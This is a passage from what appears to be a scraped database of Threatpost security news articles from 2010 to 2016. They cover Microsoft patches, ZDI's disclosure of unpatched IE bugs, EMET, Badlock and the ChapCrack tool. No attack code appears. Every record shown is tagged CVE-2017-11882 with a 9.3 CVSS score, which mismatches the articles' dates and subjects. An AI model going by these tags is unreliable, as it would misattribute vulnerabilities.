ZDI reported the bugs to Microsoft last year and disclosed some limited details of them in February. The researchers waited to release the full details until Microsoft fixed all of the flaws, but Microsoft later informed them that they didn\u2019t plan to patch the remaining bugs because they didn\u2019t affect 64-bit systems.\n\n\u201cIn this situation, Microsoft\u2019s statement is technically correct \u2013 64-bit versions do benefit from ASLR more than 32-bit versions. A 64-bit system has a much larger address space than a 32-bit system, which makes ASLR that much more effective. However what is lost here is that the bypass described and submitted only works for 32-bit systems, which is the default configuration on millions of systems. To demonstrate this, we have released proof-of-concept (PoC) code to demonstrate this bypass on Windows 7 and Windows 8.1,\u201d a blog [post](<http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/There-and-back-again-a-journey-through-bounty-award-and/ba-p/6756465#.VYgirOs2ItZ>) from Dustin Childs of HP says. \n\nChilds, who is a former Microsoft security official, said ZDI is releasing the details and [PoC code](<https://github.com/thezdi/abusing-silent-mitigations>) in order to give users as much information as possible to defend themselves against potential attacks.\n\n\u201cSince Microsoft feels these issues do not impact a default configuration of IE (thus affecting a large number of customers), it is in their judgment not worth their resources and the potential regression risk. 
We disagree with that opinion and are releasing the PoC information to the community in the belief that concerned users should be as fully informed as possible in order to take whatever measures they find appropriate for their own installations,\u201d he said.\n\nMicrosoft did not provide a comment in time for publication of this story.\n", "cvss3": {}, "published": "2015-06-22T15:11:28", "type": "threatpost", "title": "HP Releases Details, Exploit Code for Unpatched IE Flaws", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-06-25T21:13:37", "id": "THREATPOST:DC91E1B2D30C1A0D1ED78420E79DCE86", "href": "https://threatpost.com/hp-releases-details-exploit-code-for-unpatched-ie-flaws/113408/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:43", "description": "Microsoft will, next week, patch a [zero-day vulnerability in its GDI+ graphics component](<http://threatpost.com/microsoft-warns-of-targeted-attacks-on-windows-0-day/102821>) being exploited in targeted attacks in the Middle East and Asia.\n\nThe zero day has sat unpatched since it was made public Nov. 5; Microsoft did release a FixIt tool as a temporary mitigation. The patch is one of 11 bulletins Microsoft said today it will release as part of its [December 2013 Patch Tuesday security updates](<http://technet.microsoft.com/en-us/security/bulletin/ms13-dec>); five of the bulletins will be rated critical.\n\nMicrosoft did confirm, however, that a [zero day in the NDProxy driver](<http://threatpost.com/latest-xp-zero-day-renews-calls-to-move-off-the-os/103058>) that manages the Microsoft Telephony API on Windows XP systems will not be patched. 
That zero day is also being exploited in the wild alongside a PDF exploit of a patched Adobe Reader flaw.\n\nThe GDI+ vulnerability is found in several versions of Windows and Office and enables an attacker to gain remote-code execution, but only on Windows Vista, Windows Server 2008, and Office 2003 through 2010. The vulnerability exists in the way the GDI+ component handles TIFF images. Microsoft said an attacker would have to entice a victim to preview or open a malicious TIFF attachment or visit a website hosting the exploit image.\n\nTuesday\u2019s critical patches address remote code execution vulnerabilities in a number of Microsoft products, including not only Windows and Office, but Lync, Internet Explorer and Exchange. Vulnerabilities in SharePoint, Lync, SignalR and ASP.NET are among those rated important by Microsoft. Those vulnerabilities are primarily privilege escalation issues, along with an information disclosure bug.\n\nThis will be the last scheduled release of security updates from Microsoft for the year. It looks like Tuesday\u2019s updates will bring the 2013 count to 106 bulletins, up sharply from 83 last year, according to Qualys CTO Wolfgang Kandek. Microsoft had similar numbers of bulletins in 2011 (100) and 2010 (106).\n\n\u201cRegarding 0-days, Microsoft has consistently pointed out that the additional security toolkit EMET (Enhanced Mitigation Experience Toolkit) has been effective against all of the 0-day problems this year,\u201d Kandek said. \u201cWe believe it is a proactive security measure that organizations should evaluate and consider as an additional layer in their defensive measures.\u201d\n\nThe XP zero-day, meanwhile, will likely be left for the January 2014 Patch Tuesday updates. 
The vulnerability is a privilege escalation vulnerability and allows kernel access.\n\nFireEye researchers said they found the exploit in the wild being used [alongside a PDF-based exploit](<http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html>) against a patched Adobe Reader vulnerability. Reader versions 9.5.4, 10.1.6, 11.0.02 and earlier on XP SP3 are affected, later versions are not, FireEye said, adding that this exploit gives a local user the ability to execute code in the kernel, such as install new software, manipulate data, or create new accounts. The exploit cannot be used remotely, the company said.\n\nMicrosoft recommended deleting the NDProxy.sys driver as a workaround; the mitigation, however, will impact TAPI operations.\n\n\u201cSystem administrators everywhere must have made Microsoft\u2019s naughty list because this holiday \u2018gift\u2019 is clearly a lump of coal,\u201d said Tyler Reguly, technical manager of security research and development at Tripwire. \u201cMicrosoft is wrapping up the 2013 patch season with anything that was laying around. 
Someone should tell Microsoft they forgot to include the kitchen sink.\u201d\n", "cvss3": {}, "published": "2013-12-05T16:07:42", "type": "threatpost", "title": "TIFF Zero Day Patch Among December 2013 Microsoft updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-12-05T21:07:43", "id": "THREATPOST:1256E9A9997A1C51E9DB7AEB7A420D3D", "href": "https://threatpost.com/microsoft-to-patch-tiff-zero-day-wait-til-next-year-for-xp-zero-day-fix/103117/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:14", "description": "[](<https://threatpost.com/microsoft-unveils-new-windows-defender-offline-tool-120911/>)Microsoft has released a beta version of a new tool that can help victims of malware attacks recover from ugly infections, even if they don\u2019t have the ability to reach the Internet. The Windows Defender Offline tool enables users to clean their systems of malware from a CD or other removable media.\n\nIn some ways, the new tool is a throwback to the bygone days of computing and viruses when the malware universe was small enough that all of the definitions to combat it could fit on a floppy disk. Back then, users would often have a rescue disk that could help them boot their PC in the event of a messy malware infestation. Microsoft\u2019s [Windows Defender Offline](<http://windows.microsoft.com/en-US/windows/what-is-windows-defender-offline>) uses the same idea, by enabling users to download a large definition file and then transfer it to a USB drive, CD or other portable medium.\n\nThere are some pernicious classes of malware, including some rootkits and ransomware programs, that will prevent users from accessing the Internet or doing any kind of normal operations on their PCs. 
In those cases, it can be difficult or impossible for a user to run a system scan with installed antimalware applications or run a scan from the Web.\n\nA user who finds herself in such a situation would be able to boot her PC from the CD or USB drive containing the offline tool and then proceed with the malware cleaning.\n\n\u201cWindows Defender Offline Beta can help remove such hard to find malicious and potentially unwanted programs using definitions that recognize threats. Definitions are files that provide an encyclopedia of potential software threats. Because new threats appear daily, it\u2019s important to always have the most up-to-date definitions installed in Windows Defender Offline Beta. Armed with definition files, Windows Defender Offline Beta can detect malicious and potentially unwanted software, and then notify you of the risks,\u201d Microsoft\u2019s documentation for the Windows Defender Offline tool says.\n\nThe new tool is currently in beta form, but it\u2019s available for download from Microsoft\u2019s site now.\n", "cvss3": {}, "published": "2011-12-09T12:57:19", "type": "threatpost", "title": "Microsoft Unveils New Windows Defender Offline Tool", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:11", "id": "THREATPOST:2E13C5A3F37F020F188FBBE61F9209BC", "href": "https://threatpost.com/microsoft-unveils-new-windows-defender-offline-tool-120911/75979/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:19", "description": "SAN FRANCISCO \u2013 Enterprises beat up by wave after wave of Java exploits and calls to disable the platform may soon have some relief in sight.\n\nMicrosoft\u2019s free Enhanced Mitigation Experience Toolkit will soon have a new feature that allows users to configure where plug-ins, especially those targeted by hackers such as Java and Adobe Flash, are allowed to run by default. 
The feature is called Attack Surface Reduction, and it\u2019s one of two that Microsoft has made available in a [technical preview of EMET 5.0](<http://blogs.technet.com/b/srd/archive/2014/02/21/announcing-emet-5-0-technical-preview.aspx>) released today at RSA Conference 2014.\n\n\u201cASR is going to help a lot of people,\u201d said Microsoft software security engineer Jonathan Ness.\n\nBlocking Java outright, despite some of the dire attacks reported during the past 15 months, isn\u2019t an option for most companies that have built custom Java applications for critical processes such as payroll or human resources. With 5.0, users will have the option to run plug-ins in the Intranet zone while blocking them in the browser\u2019s Internet zone, or vice-versa.\n\n\u201cIt gives customers more control over how plug-ins are loaded into applications,\u201d said Ness, explaining users will have the flexibility, for example, to allow Flash to load in a browser, but block it in an Office application such as Word or Excel. A number of advanced attacks have contained malicious embedded Flash files inside benign Word documents or Excel spreadsheets. Microsoft hopes to use feedback received on the Technical Preview to shape the final 5.0 product.\n\n\u201cFeedback is really valuable, and has helped shape this tool,\u201d Ness said, adding that the release of EMET 4.1 was delayed right before launch to correct a shortcoming pointed out by a beta user. The customer was not pleased with EMET\u2019s automatic termination of applications upon detecting an exploit, rather than having a configuration option available where the event could be logged and analyzed later.\n\nMicrosoft has been vocal about recommending EMET as a temporary mitigation for zero-day attacks against previously unreported vulnerabilities. EMET includes a dozen mitigations that block exploit attempts targeting memory vulnerabilities. 
Most of the mitigations are for return-oriented programming exploits, in addition to memory-based mitigations ASLR, DEP, heap spray and SEHOP protections. EMET is not meant as a permanent fix, but only as a stopgap until a patch is ready for rollout.\n\nThe second new feature in the EMET 5.0 Technical Preview is a number of enhanced capabilities to Export Address Table Filtering, or EAF+. Ness said EAF+ blocks how shellcode calls are made into EA table filtering.\n\n\u201cWith OS functions such as open file or create process, exported code wants to jump into EAF. This filters the shellcode and blocks it if it\u2019s an exploit,\u201d Ness said. \u201cWe\u2019re extending that with new filtering (KERNELBASE exports and additional integrity checks on stack registers and limits).\u201d\n\nEMET raises development costs for exploit writers with its memory protections, so much so that the recent Operation SnowMan APT attack included a module that detected whether an EMET library was present and if so, the exploit would not execute itself. Researchers have developed bypasses of EMET\u2019s mitigations, first Aaron Portnoy of Exodus Intelligence last summer, and most recently, researchers at Bromium Labs who developed a complete EMET bypass.\n\nMicrosoft\u2019s Ness said improvements to EMET\u2019s Deep Hooks API protections have been rolled into the 5.0 Technical Preview that address the Bromium bypass. 
Whether it remains on by default in the final 5.0 remains to be seen as application compatibility issues have to be resolved first, Ness said.\n", "cvss3": {}, "published": "2014-02-25T16:37:11", "type": "threatpost", "title": "Microsoft EMET 5.0 Technical Preview Released", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-02-25T21:37:11", "id": "THREATPOST:FD699B5CBB882E8FB3DDF3341B557D27", "href": "https://threatpost.com/emet-5-0-technical-preview-offers-secure-plug-in-control/104490/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:22", "description": "Another month, another set of [Microsoft Patch Tuesday security updates](<http://technet.microsoft.com/en-us/security/bulletin/ms13-aug>) for Internet Explorer.\n\nFor what seems to be the umpteenth month in a row, Microsoft will patch its browser, one of three critical updates expected to be shipped on Tuesday among eight bulletins.\n\nWhile IE patches remain a constant in 2013, IT administrators and network managers also need to be aware of a critical set of patches for Microsoft Exchange Server 2013, as well as 2010 and 2007, both of which are on Service Pack 3.\n\nThe critical bugs in IE, Exchange Server and the Windows OS are all rated critical because they are remotely exploitable; it\u2019s unknown today how many are being actively exploited.\n\n\u201cAcross the board, all supported versions of Microsoft Exchange Server are affected by a critical vulnerability,\u201d said Tripwire security researcher Craig Young. \u201cIf I remember correctly, the last time we saw this was back in February when it was revealed that the transcoding service used to render content for Outlook Web Access sessions could be abused for remote code execution in the context of that service. 
Exchange servers are invariably connected to the Internet in some form or another so it\u2019s going to be urgent to patch this one post-haste.\u201d\n\n[MS13-012](<http://technet.microsoft.com/en-us/security/bulletin/ms13-012>), released in February, patched [vulnerabilities in the Exchange WebReady Document Viewing](<http://threatpost.com/microsoft-patches-critical-ie-vulnerabilities-021213/77519>) feature; if a user viewed a malicious file through OWA in a browser, an attacker could run code on the Exchange server remotely or crash the server.\n\nRoss Barrett, senior manager of security engineering at Rapid7, said the Exchange patches should be of the greatest concern to organizations.\n\n\u201cIf this is truly a remotely exploitable issue that does not require user interaction, then it\u2019s a potentially wormable issue and definitely should be put at the top of the patching priority list,\u201d Barrett said.\n\nIE, meanwhile, is about to be patched for the eighth time this year including an [out-of-band patch](<http://threatpost.com/out-band-ie-patch-released-more-sites-attacked-011413/77403>) in January to address exploits being used in a number of watering hole attacks.\n\nThe third critical bulletin addresses vulnerabilities in Windows XP and Windows Server 2003 that are remotely exploitable.\n\n\u201cFor some organizations this patch may be of less concern, if they have already moved to newer Windows versions,\u201d Barrett said.\n\nThe remaining bulletins are rated \u201cImportant\u201d by Microsoft based on whether they are remotely exploitable and whether exploits are in the wild. 
All of the \u201cImportant\u201d bulletins patch vulnerabilities in Windows; two of them are privilege escalation bugs, two are denial-of-service vulnerabilities and one information disclosure flaw.\n", "cvss3": {}, "published": "2013-08-08T15:28:06", "type": "threatpost", "title": "August 2013 Microsoft Patch Tuesday Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-08-16T18:07:04", "id": "THREATPOST:4C788DAABFE70AE1D1483D4039B3767E", "href": "https://threatpost.com/critical-ie-exchange-updates-on-tap-in-august-patch-tuesday-release/101943/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:35", "description": "Despite the [Badlock hype machine](<https://threatpost.com/badlock-vulnerability-falls-flat-against-its-hype/117349/>) cranked up high, we don\u2019t know much about this impending soul-crushing vulnerability other than it could be bad, it could be in the Windows Server Message Block and it already has its own requisite logo and website.\n\nNonetheless, we have a little more than two weeks before the next Microsoft Patch Tuesday on April 12 to speculate, guess and fear what might come first: the patch or a public exploit.\n\nStefan Metzmacher, a member of the Samba team and an employee with German consultancy SerNet, is credited with finding the bug and said both Samba and Windows will be patched. He said deductive reasoning leads us to consider that the bug might be in Server Message Block (SMB). Samba is an open source SMB implementation.\n\nBug hunters, good and bad, are surely on the case and some have already found what could be a juicy clue in one of Metzmacher\u2019s [commits to git.samba.org](<https://git.samba.org/?p=samba.git;a=blob;f=source4/libcli/smb2/lock.c;h=f2a76d876a103ce0dd06a5b362c2e629974772d5;hb=HEAD>). 
Metzmacher is the author of the lock.c file in Samba\u2014it handles SMB2 client lock handling\u2014and within a particular commit he includes a comment: \u201d /* this is quite bizarre \u2013 the spec says we must lie about the length! */\u201d\n\nThere\u2019s no confirmation this is the bug, but one researcher told Threatpost that the comment indicates that there are places in the protocol where the size of a string would be misrepresented. This could lead to serious errors because a developer could use the size to allocate space in a buffer, which is fine if the number is accurate. But if the length is a \u201clie\u201d as Metzmacher says, and you copy more bytes than there is room allocated, you have a buffer overrun and code execution.\n\nWhether there is enough information for an exploit writer to craft something nasty in the next two weeks remains to be seen. One thing is for certain, however: defenders will sway in the wind for the next 15 days.\n\n\u201cA skilled exploit writer may have enough information to write an exploit based on this information. On the other hand, as a defender, I am missing some details,\u201d said Johannes Ullrich, dean of research at the SANS Institute and director of the SANS Internet Storm Center. \u201cFor example, it would be nice to know if this affects servers only, or clients as well. Which network ports and which SMB version are affected? 
These are things that would help defenders, but they are missing from the advisory.\u201d\n\nThe [Badlock website](<http://badlock.org/>) isn\u2019t helpful on details either, other than to say that patches will be available for Samba 4.4, 4.3 and 4.2; it cautions that since Samba 4.4.0 was released March 22, Samba 4.1 will no longer be supported.\n\nThe SANS website, meanwhile, cautions that UNIX administrators need to pay attention to the details once they\u2019re made public, and suggests [scanning environments](<https://isc.sans.edu/diary/Getting+Ready+for+Badlock/20877>) for servers with SMB enabled; it\u2019s expected that UNIX implementations would also patch on or around April 12.\n\nIn the meantime, the situation has also stirred up a healthy debate over whether big bugs are being trivialized, not only by self-serving advanced notification, but also by websites and branding with logos.\n\nFrom Badlock.org:\n\n> \u201cThe main goal of this announcement is to give a heads up and to get you ready to patch all systems as fast as possible and have sysadmin resources available on the day the patch will be released. Vendors and distributors of Samba are being informed before a security fix is released in any case. This is part of any Samba security release process.\n> \n> Weighting to the respective interests of advance warning and utmost secrecy we chose to warn you beforehand, so that everyone has a chance to be ready to install the fixes as soon as they are available. Once the patch is released to the public, it will point to attack vectors and exploits will be in the wild in no time.\u201d\n\nMicrosoft has chosen not to add anything to the discussion; a representative told Threatpost: \u201cUnfortunately, Microsoft doesn\u2019t have anything to share.\u201d SerNet CEO Johannes Loxen refused to comment further in an email to Threatpost beyond what is on the badlock.org site. 
Loxen did concede in a tweet that the advanced notification on the bug is self-serving in terms of marketing and attention toward his company. The tweets have since been deleted.\n\nDan Kaminsky, whose 2008 DNS vulnerability and patch coordination is largely considered the first of its kind, was critical of the hype. He told _Wired_ that this [type of disclosure](<http://www.wired.com/2016/03/hype-around-mysterious-badlock-bug-raises-criticism/>) isn\u2019t helpful to admins. \u201cWhat\u2019s the call to action other than to pay attention?\u201d\n\nAndrew Storms, vice president of security services at New Context, recalled the angst for some around Microsoft\u2019s decision of last January to discontinue Patch Tuesday advanced notification and limit it only to [paying Premier customers](<https://threatpost.com/microsoft-limits-advanced-patch-notifications-to-premier-customers/110294/>).\n\n\u201cI\u2019ve always been a proponent of the advanced notification. And I was one of the people upset when Microsoft closed up ANS. That few days of heads up gives managers a chance to prep resources,\u201d Storms said. \u201cWhether that\u2019s people or servers or test systems, I\u2019ve always contended that some heads up is better than the big surprise disruption.\u201d\n\nSANS\u2019 Ullrich said advanced notification allows for preparation in areas such as inventories of vulnerable systems, counter measures and configuration options, all of which speed up patching. \n\u201c\u2018Branded\u2019 vulnerabilities are likely patched faster and more organizations will patch them given the attention paid to them (it would be nice to collect some hard numbers on this, but I haven\u2019t seen any studies to that effect yet),\u201d Ullrich said. \u201cOn the other hand, \u2018branded\u2019 vulnerabilities should be reserved for the most severe vulnerabilities. 
In that way, we will have to see if this vulnerability does meet that threshold.\u201d\n", "cvss3": {}, "published": "2016-03-28T11:45:05", "type": "threatpost", "title": "Badlock Bug in Samba SMB Protocol", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-04-12T18:50:16", "id": "THREATPOST:40C7024941C4F0096D439BD79BF49C6D", "href": "https://threatpost.com/badlock-vulnerability-clues-few-and-far-between/117008/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:02", "description": "Microsoft announced Wednesday it will tweak the release of its forthcoming Windows 8 operating system to comply with the European Commission, which argues that in its current state, the software fails to offer customers a browser choice screen to let them \u201ceasily choose their preferred web browser.\u201d\n\nThe browser choice issue was also present in Windows 7 and according to the European Union antitrust commissioner Joaquin Almunia this morning, the EU has been in contact with Microsoft to ensure it doesn\u2019t repeat the same mistake.\n\nAccording to reports, Microsoft was advised to remedy the issue \u201cif they don\u2019t want to take the risk of a new investigation,\u201d Almunia [warned at press conference earlier today](<http://www.google.com/hostednews/afp/article/ALeqM5iXITc3iybCliakA7TZ496XmzPS5g?docId=CNG.8bb0ab94569c4cff3a09e64804358eaa.441>).\n\nThe EU initially took issue that Microsoft\u2019s Windows 7 Service Pack 1, released in February 2011, failed to offer users a choice, something the company has been legally bound to do in Europe since December 2009. 
After that ruling, the EU mandated that Microsoft display a choice screen to \u201caddress competition concerns.\u201d While the choice screen popped up in March 2010 as part of a five-year agreement, from February 2011 to July 2012, the \u201cchoice screen\u201d disappeared from Windows.\n\n\u201cIf infringements are confirmed, Microsoft should expect sanctions,\u201d [Almunia warned in July](<http://europa.eu/rapid/press-release_IP-12-800_en.htm?locale=en>), when proceedings against Microsoft over the most recent issue were opened.\n\nMicrosoft claimed the lack of a \u201cchoice screen\u201d was due to a technical error and claims it has taken steps to ensure the problem doesn\u2019t happen again. It will implement changes to Windows 8 before its release later this week, [the company acknowledged in a press release today](<http://www.microsoft.com/en-us/news/Press/2012/Oct12/10-24statement.aspx>).\n\nIn the U.S., Windows 8 is slated for release on Friday, while a tweaked version, Windows 8 Pro N, will be released in Europe without Windows Media Player. Similar to the browser choice ruling, the EU ruled in 2004\u2019s \u201cMicrosoft competition case,\u201d that tying the player to Windows was an \u201cabuse of a dominant position.\u201d In response, Microsoft had to release a version of its Windows software [with its flagship media player stripped out](<http://www.law.yale.edu/documents/pdf/The_Economists_Voice.pdf>). (.PDF)\n\nThe EU is known for taking a tougher stance toward user privacy than the U.S., along with enforcing its competition law \u2014 a law that is effectively the equivalent of the U.S.\u2019s antitrust law. The commission fined Microsoft twice, [in 2004 and 2008](<http://news.bbc.co.uk/2/hi/business/7266629.stm>) after it determined it had gained unfair market advantage with its Windows platform. 
\n", "cvss3": {}, "published": "2012-10-24T19:01:05", "type": "threatpost", "title": "Microsoft Agrees to Modify Windows 8 Following EU Complaint", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:20", "id": "THREATPOST:61AC6ABD7798785567FFEEBEF573CDF8", "href": "https://threatpost.com/microsoft-agrees-modify-windows-8-following-eu-complaint-102412/77151/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:24", "description": "Microsoft is warning customers about the availability of the [ChapCrack tool that Moxie Marlinspike built](<https://threatpost.com/new-tool-moxie-marlinspike-cracks-some-crypto-passwords-073012/>) to crack the VPN credentials for systems built on the MS-CHAPv2 protocol. The company said that while it\u2019s not aware of any active attacks using the tool, customers can protect themselves by implementing PEAP or changing to a more secure VPN tunnel.\n\nMarlinspike unveiled the ChapCrack tool at DEF CON last month, and it\u2019s designed to take packet captures from sessions using the MS-CHAPv2 protocol and pull the user\u2019s authentication material out of the cryptographic handshake in the session. ChapCrack reduces the captured handshake to a single DES key search, which Marlinspike submits to the CloudCracker service; the cracked key comes back to ChapCrack, which uses it to recover the user\u2019s NT password hash. That hash, not the cleartext password, is all MS-CHAPv2 needs to authenticate, so an attacker holding it can log in as the user.\n\nIn its advisory, Microsoft says that while the ChapCrack tool doesn\u2019t take advantage of a security vulnerability per se, it still represents a risk to users.\n\n\u201cAn attacker who successfully exploited these cryptographic weaknesses could obtain user credentials. 
Those credentials could then be re-used to authenticate the attacker to network resources, and the attacker could take any action that the user could take on that network resource,\u201d the company said in its [advisory on ChapCrack](<http://technet.microsoft.com/en-us/security/advisory/2743314>).\n\n\u201cAn attacker has to be able to intercept the victim\u2019s MS-CHAP v2 handshake in order to exploit this weakness, by performing man-in-the-middle attacks or by intercepting open wireless traffic. An attacker who obtained the MS-CHAP v2 authentication traffic could then use the exploit code to decrypt a user\u2019s credentials.\u201d\n\nMicrosoft recommends that customers who use MS-CHAPv2 implement PEAP (protected extensible authentication protocol) to further secure their VPNs. \n", "cvss3": {}, "published": "2012-08-20T19:11:41", "type": "threatpost", "title": "Microsoft Warns Users About ChapCrack Tool Availability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:41", "id": "THREATPOST:70B08FC40DE9224ACE3D689EE22897C0", "href": "https://threatpost.com/microsoft-warns-users-about-chapcrack-tool-availability-082012/76929/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:46", "description": "[ \n \n](<http://go.microsoft.com/fwlink/?LinkID=124807>)\n\nJonathan Ness of Microsoft\u2019s Security Research and Defense team explains the inner workings of the Data Execution Prevention technology that can help mitigate the [targeted attacks exploiting the vulnerability in Internet Explorer](<https://threatpost.com/how-dep-can-mitigate-ie-zero-day-attacks-011910/>) right now.\n", "cvss3": {}, "published": "2010-01-19T14:32:51", "type": "threatpost", "title": "How DEP Can Mitigate IE Zero-Day Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:06", "id": 
"THREATPOST:1B56CE326878B69FFA20FFC20DB62365", "href": "https://threatpost.com/how-dep-can-mitigate-ie-zero-day-attacks-011910/73391/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:11", "description": "The [Operation SnowMan espionage campaign](<http://threatpost.com/new-ie-10-zero-day-targeting-military-intelligence/104272>), which targeted military intelligence earlier this year via an Internet Explorer zero day, exposed a weak spot in Microsoft\u2019s vulnerability management efforts. What was unique about the SnowMan operation is that it included a check as to whether the compromised computer was running [Microsoft\u2019s Enhanced Mitigation Experience Toolkit (EMET)](<http://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619>), and if so, the attack would not execute.\n\nAs it turns out, attackers were taking advantage of an information disclosure bug that revealed whether EMET and other antimalware protections were active. Today, Microsoft took steps to close that gap in its latest cumulative update for IE.\n\nThe critical patch is one of four released today by Microsoft as part of its monthly [Patch Tuesday security bulletins](<https://technet.microsoft.com/library/security/ms14-sep>). The IE update patches 37 vulnerabilities, including the publicly known disclosure bug. The three remaining bulletins for .NET, Windows Task Scheduler, and Microsoft Lync, were rated important by Microsoft and likely don\u2019t result in remote code execution.\n\nEMET is a free toolkit provided by Microsoft that midmarket and enterprise IT shops can deploy as a temporary stopgap for a zero-day vulnerability being exploited in the wild. The toolkit provides a host of exploit mitigations that protect against common memory corruption vulnerabilities. 
The vulnerability patched in IE allows resources loaded into memory to be queried, Microsoft said, giving attackers a heads-up as to what protections are running on a machine.\n\nThe IE patch, [MS14-052](<https://technet.microsoft.com/library/security/MS14-052>), is the highest priority bulletin for IT shops this month, experts said.\n\n\u201cThis patch is Microsoft\u2019s attempt to limit the capability of exploit kits that have been identified as using an information disclosure technique to determine if particular security software were installed,\u201d said Craig Young, a security researcher with Tripwire. \u201cThe flaw allows a malicious website to determine if a software package is installed by querying the availability of a DLL used by that software. Information regarding active security products on a target is very useful for an attacker; it allows them to avoid raising alarms by sending detectable payloads.\u201d\n\nThe update also patches vulnerabilities in the browser going back to IE6 running on Windows Server through current versions.\n\nThe next bulletin worth watching, experts said, is [MS14-054](<https://technet.microsoft.com/library/security/MS14-054>), a privilege escalation vulnerability in Task Scheduler. In order to exploit the bug, an attacker would need to have valid credentials and local access to an affected system in order to run their exploit.\n\nThe vulnerability affects Windows 8, Windows 8.1, Windows RT and Windows RT 8.1, as well as Windows Server 2012 and Windows Server 2012 R2.\n\n\u201cMS14-054 should also be high on IT admins\u2019 patch list as Microsoft expects to see reliable task scheduler exploits developed within a month,\u201d Young said. 
\u201cSuccessful exploitation of this vulnerability would allow any user to take complete control of the affected system.\u201d\n\nMicrosoft also patched a denial-of-service vulnerability in its .NET framework. [MS14-053](<https://technet.microsoft.com/library/security/MS14-053>) affects most versions of .NET, and also affects ASP.NET installations if it\u2019s enabled on IIS.\n\n\u201cIf left unpatched, remote un-authenticated attackers can send HTTP/HTTPS requests to cause resource exhaustion, which will ultimately lead to a denial-of-service condition on the ASP.NET web server,\u201d said Amol Sarwate, director of vulnerability labs at Qualys.\n\nThe final bulletin, [MS14-055](<https://technet.microsoft.com/library/security/MS14-055>), patches three denial-of-service vulnerabilities in Microsoft\u2019s messaging server, Lync.\n\n\u201cThe security update addresses the vulnerabilities by correcting the way Lync Server sanitizes user input and by correcting the way Lync Server handles exceptions and null dereferences,\u201d Microsoft said in its advisory.\n\nMicrosoft also updated three security advisories today:\n\n * [Advisory 2871997](<https://technet.microsoft.com/library/security/2871997.aspx>) updates credential protection and domain authentication controls for Windows 7 and Windows Server 2008 R2. The update ensures credentials are cleaned up immediately rather than when a new Kerberos TGT ticket has been obtained.\n * [Advisory 2905247](<https://technet.microsoft.com/library/security/2905247.aspx>) is an update for Microsoft ASP.NET that patches a privilege elevation vulnerability in ASP.NET view state that was made available last December. 
As of today\u2019s update, the security update is available via Microsoft Update in addition to the Download-Center-only option provided in December.\n * [Advisory 2755801](<https://technet.microsoft.com/en-us/library/security/2755801.aspx>) is an update for Adobe Flash Player in Internet Explorer versions running on Windows 8 and Windows 8.1. Today\u2019s update is for IE 10 on Windows 8, Windows Server 2012 and Windows RT, and IE 11 on Windows 8.1, Windows Server 2012 R2 and Windows RT 8.1.\n", "cvss3": {}, "published": "2014-09-09T14:40:33", "type": "threatpost", "title": "September 2014 Microsoft Patch Tuesday security bulletins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-09T18:40:33", "id": "THREATPOST:D4C8CD7D146990740B8339D88A3FDB84", "href": "https://threatpost.com/emet-av-disclosure-leak-plugged-in-ie/108175/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:20", "description": "[](<https://threatpost.com/microsoft-ships-anti-exploit-tool-it-admins-072810/>)LAS VEGAS \u2014 Microsoft today released a new tool to help IT administrators backport anti-exploit mitigations like ASLR (Address Space Layout Randomization) and DEP (Data Execution Prevention) to older versions of Windows.\n\nThe tool, called the Enhanced Mitigation Experience Toolkit (EMET), works by applying security mitigation technologies to arbitrary applications to block exploitation through common attack vectors.\n\nIn addition to implementing ASLR and DEP on older versions of the Windows operating system, Microsoft said EMET will also add anti-exploit mitigations to existing third-party software that does not currently opt in to the mitigations.\n\n\u201cThis helps to protect against successful exploitation of vulnerabilities without available fixes,\u201d says Mike Reavey, a director in Microsoft\u2019s Security Response Center (MSRC). 
